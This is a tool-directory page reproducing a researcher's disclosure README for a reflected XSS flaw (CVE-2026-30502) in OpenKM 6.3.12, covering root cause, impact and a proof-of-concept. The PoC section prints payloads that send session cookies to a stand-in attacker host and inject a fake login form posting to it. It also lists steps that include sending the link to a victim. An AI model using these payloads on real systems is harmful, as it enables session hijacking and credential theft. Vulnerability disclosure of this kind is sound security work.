Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS — Documentation and proof-of-concept for CVE-2026-30502, a reflected XSS vulnerability in OpenKM v6.3.12. Includes technical analysis, root cause, impact assessment, and remediation guidance for security researchers and penetration testers. | Kitploit
Tools/GitHubGitHub/dharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss
Phishing ToolsVulnerability AnalysisWeb Application ExploitationPenetration TestingPapers & ResearchLearning & Education
GitHubdharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss

CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Documentation and proof-of-concept for CVE-2026-30502, a reflected XSS vulnerability in OpenKM v6.3.12. Includes technical analysis, root cause, impact assessment, and remediation guidance for security researchers and penetration testers.

View Repository
193 months agoNot yet reviewed

🛡️ CVE-2026-30502 — Reflected XSS in OpenKM v6.3.12

CVE Badge OpenKM Type Disclosure Status

Discovered & Reported by Dharmendra Kumar — Security Researcher

Cybersecurity | Penetration Testing | Vulnerability Research | Responsible Disclosure


📌 Table of Contents

  • Overview
  • CVE Details
  • Affected Product
  • Vulnerability Description
  • Root Cause Analysis
  • Impact & Risk Assessment
  • Proof of Concept (PoC)
  • Remediation & Recommendations
  • Disclosure Timeline
  • References
  • About the Researcher

🔍 Overview

This repository documents the responsible disclosure of CVE-2026-30502, a Reflected Cross-Site Scripting (XSS) vulnerability identified in OpenKM v6.3.12 — a widely deployed open-source document management system used across enterprise and government environments.

The vulnerability exists in the Content parameter, which reflects user-supplied input back to the browser without proper sanitization or output encoding. An attacker can craft a malicious URL containing embedded JavaScript and social-engineer a victim into clicking it, resulting in script execution within the victim's browser session.

⚠️ Severity: Medium–High | Attack Vector: Network | Privileges Required: None | User Interaction: Required


📋 CVE Details

FieldDetails
CVE IDCVE-2026-30502
ProductOpenKM
Affected Versionv6.3.12
Vulnerability ClassReflected Cross-Site Scripting (XSS)
Vulnerable ParameterContent
CWECWE-79: Improper Neutralization of Input During Web Page Generation
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
SeverityMedium–High
PublisherMITRE CVE Program
ResearcherDharmendra Kumar
Disclosure TypeResponsible / Coordinated

📦 Affected Product

OpenKM is a free and open-source document management system (DMS) providing a web interface for managing, auditing, and distributing business documents. It is used by enterprises, government bodies, and educational institutions worldwide.

  • Product Name: OpenKM Document Management System
  • Affected Version: v6.3.12
  • Vendor Website: https://www.openkm.com
  • Category: Document Management System (DMS)
  • Language / Stack: Java (JSP / Spring Framework)

🧨 Vulnerability Description

A Reflected Cross-Site Scripting (XSS) vulnerability was identified in OpenKM v6.3.12 via the Content parameter. The application fails to validate or encode user-supplied input before reflecting it back in the HTTP response body, allowing arbitrary JavaScript to be injected and executed in the victim's browser.

Unlike Stored XSS, a Reflected XSS payload is not persisted in the database — instead, it rides within a crafted URL. The attack relies on the victim being tricked into clicking a malicious link (delivered via email, social media, or phishing campaigns), after which the payload executes silently in their browser with the victim's session context.

Attack Flow

Attacker crafts malicious URL
        │
        ▼
Victim clicks the link (phishing / social engineering)
        │
        ▼
Browser sends GET/POST request with payload in `Content` parameter
        │
        ▼
OpenKM reflects unsanitized input directly into HTML response
        │
        ▼
Browser parses & executes injected JavaScript
        │
        ▼
Session hijacked / credentials harvested / account compromised

🔬 Root Cause Analysis

The vulnerability results from the application's failure to enforce input-output security controls on the Content parameter:

WeaknessDescription
❌ No Input ValidationThe Content parameter accepts raw HTML/JavaScript characters without restriction or filtering
❌ No Output EncodingReflected values are written into the HTML response without HTML-entity encoding
❌ Missing CSP HeaderNo Content Security Policy is enforced to block inline script execution
❌ No HTTPOnly CookiesSession tokens are accessible via JavaScript, enabling direct cookie theft
User-Crafted URL ──► Content Parameter ──► [NO Validation]
       ──► Reflected in HTML Response ──► [NO Encoding]
              ──► Browser Executes Script ──► Account Compromised

💥 Impact & Risk Assessment

A successful exploitation of this vulnerability can lead to:

RiskDescription
🍪 Session HijackingSteal active session tokens via document.cookie to impersonate the victim
🔑 Credential HarvestingInject fake login overlays to capture plaintext usernames and passwords
📤 Information DisclosureExfiltrate sensitive document content, user data, or internal configurations
🎣 Phishing AttacksServe convincing fake pages hosted within the trusted OpenKM domain
👤 Account TakeoverPerform arbitrary authenticated actions on behalf of the victim
⚙️ Unauthorized ActionsModify, delete, or exfiltrate documents within the DMS
🖥️ Malware DistributionRedirect victims to attacker-controlled sites hosting malicious downloads

🧪 Proof of Concept (PoC)

⚠️ Disclaimer: The following information is shared strictly for educational and security research purposes under responsible disclosure principles. Do not test or use this against systems you do not own or have explicit written authorization to assess.

Payload Examples (Generic)

// Basic execution proof
<script>alert('CVE-2026-30502 - XSS by Dharmendra Kumar')</script>

// Session cookie exfiltration
<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>

// Credential phishing overlay
<script>
  var d=document.createElement('div');
  d.innerHTML='<form action="https://attacker.example.com/log" method="POST">'
    +'<input name="u" placeholder="Username"/>'
    +'<input name="p" type="password" placeholder="Password"/>'
    +'<button>Sign In</button></form>';
  document.body.prepend(d);
</script>

Crafted Malicious URL Structure

https://target-openkm-instance/[vulnerable-endpoint]?Content=<script>alert(1)</script>

Steps to Reproduce

  1. Identify the vulnerable endpoint in OpenKM v6.3.12 that reflects the Content parameter
  2. Craft a URL appending an XSS payload to the Content parameter
  3. URL-encode the payload if necessary
  4. Send the crafted link to a victim via email, chat, or any social engineering vector
  5. When the victim opens the link in their authenticated browser session, the payload executes
  6. Observe JavaScript execution, cookie theft, or redirect behavior

🛠️ Remediation & Recommendations

For Developers / Vendors

Download Tool